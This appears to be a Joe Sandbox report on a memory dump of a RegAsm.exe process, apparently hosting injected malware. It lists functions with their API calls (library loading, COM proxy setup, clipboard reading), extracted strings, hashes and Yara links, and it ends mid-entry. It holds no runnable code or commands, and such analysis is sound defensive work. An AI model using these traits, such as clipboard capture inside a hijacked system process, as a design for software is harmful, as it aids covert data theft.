
API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
Instruction ID: ea9f0b6cca55687af24dae82e070ca9713baacfb2e686af0d95a4beb36605997
Opcode Fuzzy Hash: e5a2a0082c67cb5c301fccf9abeaebcbd6283177cfdf17d39ad2cc2ad519dbb3
Instruction Fuzzy Hash: 233169B4110B409BE334CF26C999B53BBF5EB89714F448A1DE5DB4BA80CBB4B4098F95

Function 0043BC78 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 0043BCF4

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
Instruction ID: 6a5b91908db97ac0091159e2d275d9b84e4347aafb7fecb6be556b6923d5ccbe
Opcode Fuzzy Hash: 5acfd14c27bde9b74bf5aca11f72f78e1ca5bbfd350eb031bc15054e0debc95a
Instruction Fuzzy Hash: 9621C0748042558FDB14CFA8C9906BEBBB1AF06301F24459EC59233391D734BA41CBE9

Function 0043C800 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0040EF35,?,00000001,?), ref: 0043C82E

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0040A9A0 Relevance: 4.5, APIs: 3, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0040A9B9
ExitProcess.KERNEL32 ref: 0040AA0C

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExit
String ID:
API String ID: 2333725396-0
Opcode ID: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
Instruction ID: 4218e29b3bc86311983865424d116f639c7e788c7b42be7a3867dd50df405cf1
Opcode Fuzzy Hash: b203863fcc5dfd2f2068b8a58807d9dee33faf21cb1ad893444914451a0ecebb
Instruction Fuzzy Hash: 96F082B061871496CA103B768B0B32E3B546F11348F424E3BFD82711D1DB7C48B6A69F

Function 0043680F Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004367E0
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,Function_000367F0), ref: 00436801

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
Instruction ID: 85de96fdc2472c7becba0e1e7cde9433106db14601eb3176dfd388c25d5d3e4d
Opcode Fuzzy Hash: 1f4c462caab9f6b2ed01f987ea2e79c0f021f0dc3f4c8e4d67c731682aa1e547
Instruction Fuzzy Hash: 84E0FE393D8700BFF2364B50ED17F057665BB0AF02F601564B3867C5E097F176119A48

Function 00436728 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00436798

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
Instruction ID: 5a0618e91a28a85d2f86b60d01bc68a50de2481b0f7dbb12c5016779150b87dc
Opcode Fuzzy Hash: d2c6052d94313f16ea65dfe563f55348c8d742d89dbb323326da04f1fcd23508
Instruction Fuzzy Hash: B0111570100B819FD370CF29C494A26BBF1FF4A309BA09C1DE1C28B651C776E442CB54

Function 0043A7A2 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043A818

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
Instruction ID: e58a62a467fcc3cf4ca00239bb9c62a929624cff67e618a81d4e951f87d01d60
Opcode Fuzzy Hash: 467f385da2c6dae1b4972b3f25f99549e7419152301e6f524d1777dffb42152c
Instruction Fuzzy Hash: 29018F38A40248DFEB00CF64D99069DBB36EB86319F64C0D8C445277A5C332AE53CB84

Function 0043A762 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A76B

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
Instruction ID: 97f73e13ff0ba3024f09bf4723230358ed07b21731cc37c5d5ce43716dcac73c
Opcode Fuzzy Hash: 78e65d7e54fbb97d493f955b41e24730cb33fc9e0624615bae75e3f863140746
Instruction Fuzzy Hash: 8AB09274100A00ABEA155B14DC25F207A25EB44709FA008A8A815854B2C6269836D988

Non-executed Functions

Function 00425380 Relevance: 64.9, APIs: 2, Strings: 35, Instructions: 182COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004253C9
GetSystemMetrics.USER32 ref: 004253DC

Strings

=, xrefs: 0042586F
`B, xrefs: 004255BA
=, xrefs: 00425793
=, xrefs: 00425817
&dB, xrefs: 00425541
^B, xrefs: 0042561D
, xrefs: 004254D2
MdB, xrefs: 0042566A
=, xrefs: 004257D5
:fB, xrefs: 004255C5
=, xrefs: 0042582D
=, xrefs: 004257A9
=, xrefs: 00425751
=, xrefs: 0042589B
=, xrefs: 0042573B
=, xrefs: 0042570F
=, xrefs: 00425859
=, xrefs: 00425725
=, xrefs: 004257BF
=, xrefs: 004257EB
=, xrefs: 00425767
aB, xrefs: 00425562
=, xrefs: 0042577D
&`B, xrefs: 00425633
ZB, xrefs: 0042556D
=, xrefs: 00425843
YB, xrefs: 004255FC
y[B, xrefs: 004256CD
=, xrefs: 00425885
=, xrefs: 004256F9
[aB, xrefs: 0042568B
eB, xrefs: 004255D0
beB, xrefs: 00425391, 0042552B, 004256EE, 00425704, 0042571A, 00425730, 00425746, 0042575C, 00425772, 00425788, 0042579E, 004257B4, 004257CA, 004257E0, 004257F6, 0042580C, 00425822, 00425838, 0042584E, 00425864, 0042587A, 00425890, 004258A6
=, xrefs: 00425801
)YB, xrefs: 0042563E

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem
String ID: eB$ZB$aB$ $&`B$&dB$)YB$:fB$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$MdB$[aB$beB$y[B$YB$^B$`B
API String ID: 4116985748-1301689713
Opcode ID: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
Instruction ID: 2be8b3321d8ebc35c174cfe65313f19d7b7ab85f5ee63cbee2d1089338e9952b
Opcode Fuzzy Hash: ed2d5ffeca8568e32c327981134a743846ad8985eda272e08d3c848a72605f9e
Instruction Fuzzy Hash: 71C17EB000A3849FE770DF15E54878BBBE4BB86348F91891EE4994B354D7B89548CF8B

Function 0041E6C0 Relevance: 38.3, Strings: 30, Instructions: 763COMMON

Download Yara Rule

Strings

uw, xrefs: 0041F0E8
WeQg, xrefs: 0041E9EF
PA, xrefs: 0041E8B1, 0041E8E5, 0041FDE4
o=K?, xrefs: 0041E981
_-]/, xrefs: 0041E955
"A1C, xrefs: 0041E98C
4i<k, xrefs: 0041F132
9]-_, xrefs: 0041E9D9
9M'O, xrefs: 0041F2CE
56, xrefs: 0041F4EF
]i)k, xrefs: 0041E9FA
*m(o, xrefs: 0041EA05
<I/K, xrefs: 0041E9A2
@qFs, xrefs: 0041EA10
k>h0, xrefs: 0041F4D9
=E5G, xrefs: 0041E997
WP, xrefs: 0041F6EB
4`[b, xrefs: 0041F690
EuEw, xrefs: 0041EA1B
:9, xrefs: 0041EDC2
]5X7, xrefs: 0041E96B
;U0W, xrefs: 0041E9C3
1Y6[, xrefs: 0041E9CE
O!U#, xrefs: 0041E934
<a[c, xrefs: 0041E9E4
y5n3, xrefs: 0041EDA1
Q1U3, xrefs: 0041E960
IyK{, xrefs: 0041EA26
h1i?, xrefs: 0041EDAC
x:m<, xrefs: 0041F4CE

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
API String ID: 0-2269972215
Opcode ID: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
Instruction ID: d94ce0ecc20038e688a02a3dea8145f2d16f1f88ab05816ea4259b122c1fea78
Opcode Fuzzy Hash: 779dedc07c5897f8f241aca86a09de035cd84d31b5fffd4dc929a5109f8191e5
Instruction Fuzzy Hash: A2821CB410C381CBE334CF25D580B9BBBE1BB86304F208A2DE5ED9B251DB748446CB96

Function 0041E850 Relevance: 38.2, Strings: 30, Instructions: 711COMMON

Download Yara Rule

Strings

uw, xrefs: 0041F0E8
WeQg, xrefs: 0041E9EF
PA, xrefs: 0041E8B1, 0041E8E5, 0041FDE4
o=K?, xrefs: 0041E981
_-]/, xrefs: 0041E955
"A1C, xrefs: 0041E98C
4i<k, xrefs: 0041F132
9]-_, xrefs: 0041E9D9
9M'O, xrefs: 0041F2CE
56, xrefs: 0041F4EF
]i)k, xrefs: 0041E9FA
*m(o, xrefs: 0041EA05
<I/K, xrefs: 0041E9A2
@qFs, xrefs: 0041EA10
k>h0, xrefs: 0041F4D9
=E5G, xrefs: 0041E997
WP, xrefs: 0041F6EB
4`[b, xrefs: 0041F690
EuEw, xrefs: 0041EA1B
:9, xrefs: 0041EDC2
]5X7, xrefs: 0041E96B
;U0W, xrefs: 0041E9C3
1Y6[, xrefs: 0041E9CE
O!U#, xrefs: 0041E934
<a[c, xrefs: 0041E9E4
y5n3, xrefs: 0041EDA1
Q1U3, xrefs: 0041E960
IyK{, xrefs: 0041EA26
h1i?, xrefs: 0041EDAC
x:m<, xrefs: 0041F4CE

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$PA$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
API String ID: 0-2269972215
Opcode ID: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
Instruction ID: 540a42f5b2c8655fc7ab95859f4cc758c6e179cb56acad334a16f9351a1cbdc7
Opcode Fuzzy Hash: 03a559ddfeca7b8391674ecb4c394752d2d459566a40de705f58b8f5d10fe77b
Instruction Fuzzy Hash: 64820AB410C381CBE334CF25D590B9BBBE1BB86304F608A2DE5E99B255DB748446CF96

Function 00415172 Relevance: 14.8, Strings: 11, Instructions: 1041COMMON

Download Yara Rule

Strings

_Z, xrefs: 00415B40
7<0?, xrefs: 00415656
%%,?, xrefs: 00415664
x|}{, xrefs: 004159D7
]H, xrefs: 00415B47
xHx~, xrefs: 004159DE
3-), xrefs: 0041564F
3zx, xrefs: 004151AD
.W$7, xrefs: 00415672
II, xrefs: 004152C5
nml, xrefs: 004151C2

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %%,?$.W$7$3-)$3zx$7<0?$II$]H$_Z$xHx~$x|}{$nml
API String ID: 0-2043650400
Opcode ID: 12c331d8b5d8d13416437651b2242e7253393c52a438c8362e62faa65b91cd90
Instruction ID: 0c9f797e28dbec0d448f9598e5e34c6ede17afb7957d05b945e290eb3910d0cb
Opcode Fuzzy Hash: 12c331d8b5d8d13416437651b2242e7253393c52a438c8362e62faa65b91cd90
Instruction Fuzzy Hash: 3382CCB1900658CBCB14CF54C8916EEBBF1FF8A310F68859DD8956B381D339A981CF98

Function 0042A2DC Relevance: 10.4, APIs: 1, Strings: 4, Instructions: 1642COMMON

Download Yara Rule

Strings

$F0l, xrefs: 00428A0C
TW{O, xrefs: 0042959B
X\\h, xrefs: 0042A3F8
0 :b, xrefs: 004295A5

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $F0l$0 :b$TW{O$X\\h
API String ID: 0-3330333084
Opcode ID: 28783c5e86bae370d3f07f277f63f548a0e807dc07b87e52ba4ef3c7a26c3c43
Instruction ID: f2e49855611ed10df372a98b0efb2f7bf2bb7ee0b35f1a2b90431f64137dff9f
Opcode Fuzzy Hash: 28783c5e86bae370d3f07f277f63f548a0e807dc07b87e52ba4ef3c7a26c3c43
Instruction Fuzzy Hash: 9BC2CC70205B928FD325CF29C5907A7BBE1AF52304F98485EC4EB5B792C739B845CB98

Function 00431530 Relevance: 9.2, APIs: 6, Instructions: 217clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431559
GetWindowLongW.USER32 ref: 00431586
GetClipboardData.USER32 ref: 00431596
CloseClipboard.USER32 ref: 0043186D

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID:
API String ID: 1647500905-0
Opcode ID: 3dd72b256286a0f18d76cdbb97be187a757415dddf7a079ddd1879fdad43675e
Instruction ID: a76234b8b601e4b4d80af0162c0fefcc019d3c38ce0f577428fbbd3ce136ce75
Opcode Fuzzy Hash: 3dd72b256286a0f18d76cdbb97be187a757415dddf7a079ddd1879fdad43675e
Instruction Fuzzy Hash: 6F81BEF59183419BD700FF74DA0635EBEB0EB9230AF05886DD4C957342E6788558CBA7

Function 00427B30 Relevance: 5.9, Strings: 4, Instructions: 943COMMON

Download Yara Rule

Strings

X\\h, xrefs: 0042A3F8
r/!(, xrefs: 00427D09
80I9, xrefs: 00427D1D
+V5H, xrefs: 00427D13

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +V5H$80I9$X\\h$r/!(
API String ID: 0-3448863506
Opcode ID: d09c4c3c1042168905b474b04dec1a4fafe80864aa2c59e2f9f0620160f356dd
Instruction ID: 1232547257af0d836ecf51d385a685c14159f690ef23018246b655c6a21f7de8
Opcode Fuzzy Hash: d09c4c3c1042168905b474b04dec1a4fafe80864aa2c59e2f9f0620160f356dd
Instruction Fuzzy Hash: 0262E070209B918BD324CF39D5903A7FBE1AF52305F584A5EC8EB4B792C738A845CB59

Function 0042866E Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 639COMMON

Download Yara Rule

Strings

$F0l, xrefs: 00428A0C
xuy{, xrefs: 0042881C

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $F0l$xuy{
API String ID: 0-4033455903
Opcode ID: d4aa72209cdfe51b31e9bbf1ea66381a8b783033aa52dd2e276fd2dfaa7c6746
Instruction ID: 5975b3431e57897a2927422f2e4379087242e99e5fdc322d944cee440e883c9f
Opcode Fuzzy Hash: d4aa72209cdfe51b31e9bbf1ea66381a8b783033aa52dd2e276fd2dfaa7c6746
Instruction Fuzzy Hash: 4A327570505B928AD321CB35D5907EBBBE1AF16304F84485ED4EE9B382CB397509CFA8

Function 0040F578 Relevance: 5.7, Strings: 4, Instructions: 685COMMON

Download Yara Rule

Strings

FM?>, xrefs: 00410128
2, xrefs: 0040FDD3
0, xrefs: 0040FCA6
Kj, xrefs: 004100E6

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0$2$FM?>$Kj
API String ID: 0-1586943010
Opcode ID: 7014bca55ce7f15b941fd14ae6b371cb11ea1bf1fc91f27b2d0b860ed8afaba8
Instruction ID: 3c4ba65a7b84b13bbd9c5b53dbd9a4e9748074ba4e39680f501424992c42f871
Opcode Fuzzy Hash: 7014bca55ce7f15b941fd14ae6b371cb11ea1bf1fc91f27b2d0b860ed8afaba8
Instruction Fuzzy Hash: 12329CB15083818FD324DF28C89076BBBE5AF96304F18497EE4C5A7392D739D849CB5A

Function 004122E6 Relevance: 5.7, Strings: 4, Instructions: 659COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00412E70
vh, xrefs: 004128CE
01, xrefs: 00412986
F, xrefs: 00412524

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 01$4`[b$F$vh
API String ID: 0-3121856630
Opcode ID: c75e08152cccaa52ea6f5e526d03dbe727129514ef236bc7209e1ee0a300ff63
Instruction ID: d93a5d47dbff73193ef47af5b034dd88a7392ad28107363cc044db854b817e77
Opcode Fuzzy Hash: c75e08152cccaa52ea6f5e526d03dbe727129514ef236bc7209e1ee0a300ff63
Instruction Fuzzy Hash: 9F22BB71608341ABC714CF28C981BABB7E1EF89354F54892DF4C9D72A1D778D891CB4A

Function 0041F8B7 Relevance: 5.5, Strings: 4, Instructions: 519COMMON

Download Yara Rule

Strings

PA, xrefs: 0041FDE4
ol, xrefs: 0041FA13
4`[b, xrefs: 0041F690
WP, xrefs: 0041F6EB

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$PA$WP$ol
API String ID: 0-1411690081
Opcode ID: 0cb527afaef1abea81ae9eeaaf4590c194de4ed05548872f7baa8f450dbe5627
Instruction ID: aead440d2ca6fe7a1fd06a20e6f63a48c25d3b045c422a0e973e2d67a1ea3f0d
Opcode Fuzzy Hash: 0cb527afaef1abea81ae9eeaaf4590c194de4ed05548872f7baa8f450dbe5627
Instruction Fuzzy Hash: CC027A74208341CBC724DF28C5906ABB7F1FF89740F55892DE4C987261E738D98ADB9A

Function 0043DC70 Relevance: 4.5, Strings: 3, Instructions: 794COMMON

Download Yara Rule

Strings

%7, xrefs: 0043E786, 0043E726
TC, xrefs: 0043E016
%7, xrefs: 0043E1D0

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %7$%7$TC
API String ID: 0-562761838
Opcode ID: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
Instruction ID: a3390a0ea819f50f7e09a005f4fb0df624cd597feb74cf866aa404ef09407691
Opcode Fuzzy Hash: 98285b28069c82770ffc23064106d89e2dd26c25d44d21ba6645de89e21dbe50
Instruction Fuzzy Hash: 96420135A09206CFCB04CF28D8906AEB7F2FF8A304F29897DD985A7391D735A911CB55

Function 00415E62 Relevance: 4.5, Strings: 3, Instructions: 752COMMON

Download Yara Rule

Strings

)uw, xrefs: 004162AE
^Y, xrefs: 004162FB
/^A, xrefs: 00416605

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )uw$/^A$^Y
API String ID: 0-867195589
Opcode ID: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
Instruction ID: 99be8a06345161a7d2b48195821d81a54eebdd34de1f36dcd5d473763174f8cc
Opcode Fuzzy Hash: a6bb22a4967ca951d5a305e6ffd944ff0515d2462caa79e64008a8f28d3c9f51
Instruction Fuzzy Hash: CF22CEB09002168BDB24CF14C8A2BBBB7B2FF55314F198649D8565F395E339E981CB98

Function 0043DF90 Relevance: 4.4, Strings: 3, Instructions: 626COMMON

Download Yara Rule

Strings

%7, xrefs: 0043E786, 0043E726
TC, xrefs: 0043E016
%7, xrefs: 0043E1D0

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %7$%7$TC
API String ID: 0-562761838
Opcode ID: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
Instruction ID: ad095b83308ca75fd8a4013f0ebfb119efa56f614bf737352143c9b46e94c767
Opcode Fuzzy Hash: 735f6b988e88c19a902557fc86c11b8990785cf3a617012ce579f53b6f5eca15
Instruction Fuzzy Hash: EB22FF35A04216CFCB04CF68D8906AFB7F2FF8A304F29896DD881A7395D735A911CB95

Function 00413888 Relevance: 4.0, Strings: 3, Instructions: 249COMMON

Download Yara Rule

Strings

D, xrefs: 00413582
4`[b, xrefs: 00413800
4`[b, xrefs: 00413650

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$D
API String ID: 0-2855741908
Opcode ID: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
Instruction ID: 4419554b97a4f5d847f5d9919b56110a744d44bceafc1c0fee32142145e074b9
Opcode Fuzzy Hash: bee589adc475eb55dc856cc6db7432ca305c854b6497f41265853fe96f3c0c6b
Instruction Fuzzy Hash: DC816BB4208340EFD3149F55D4A076BBBE5FF86305F50892DE1C6473A0C3799951CB8A

Function 0041F862 Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

PA, xrefs: 0041FDE4
4`[b, xrefs: 0041F690
WP, xrefs: 0041F6EB

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$PA$WP
API String ID: 0-2416898959
Opcode ID: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
Instruction ID: 549f9a84d3ab0341397ba570cd15feaea4388fda82712428225536197b95a57b
Opcode Fuzzy Hash: ff2d449f2aa4d9f3ffc758bd8431d95441b0a1be0e7da30d1f37c7a3b1d079e2
Instruction Fuzzy Hash: E86156741083808BD724CF24D590AABB7E1FF8A304F689A2DE5D947361DB74D846CB8A

Function 0043E080 Relevance: 3.1, Strings: 2, Instructions: 621COMMON

Download Yara Rule

Strings

%7, xrefs: 0043E786, 0043E726
%7, xrefs: 0043E1D0

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %7$%7
API String ID: 0-3114740580
Opcode ID: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
Instruction ID: d4ddb7d9814fba6a3bd99f3c5521e18485b3bc3c6a052377e5f9b84667f3e06b
Opcode Fuzzy Hash: 95702ab8c8dfd4ffedce7bff869b12acbd51280852a3c4ef4d7a9b65a7f033b5
Instruction Fuzzy Hash: 8E221635A05216CFCB08CF68D9906AFB7F2FF8A304F28896DC841A7395D735A911CB95

Function 0041C660 Relevance: 2.9, Strings: 2, Instructions: 447COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041CAF0
xy, xrefs: 0041C682

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$xy
API String ID: 0-3861070957
Opcode ID: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
Instruction ID: 40080dca2f627201fa99e23294c6caa4fce92423dc08f85d2d2a9e2f3d3bfbd8
Opcode Fuzzy Hash: 32874e9922531811730813ef1462c357581392f5c3e4b505af1d527c3c503f32
Instruction Fuzzy Hash: ECD1DDB15482009BD715EF18C8D1B6BB7E1EF96354F04481EE4C687391E339E990CBAB

Function 004211B0 Relevance: 2.9, Strings: 2, Instructions: 374COMMON

Download Yara Rule

Strings

A@, xrefs: 00421A47
4`[b, xrefs: 00421CA0

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$A@
API String ID: 0-3080864223
Opcode ID: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
Instruction ID: 667f5a27c419ae563cc22f1d67130efefa029fb26cebeccfba75b67c4bf04443
Opcode Fuzzy Hash: c85e80eada8b595bcd8dec67665edaffd9fe9b7f5aea5fcdfa1f5076c87ae2b5
Instruction Fuzzy Hash: 17C1BBB4E00228DFEF14CFA5E995BAEBB71FF06300F5040A9E50A6B252C7345A45CF99

Function 0043D470 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

@, xrefs: 0043D3BD
476, xrefs: 0043D2E6

Memory Dump Source

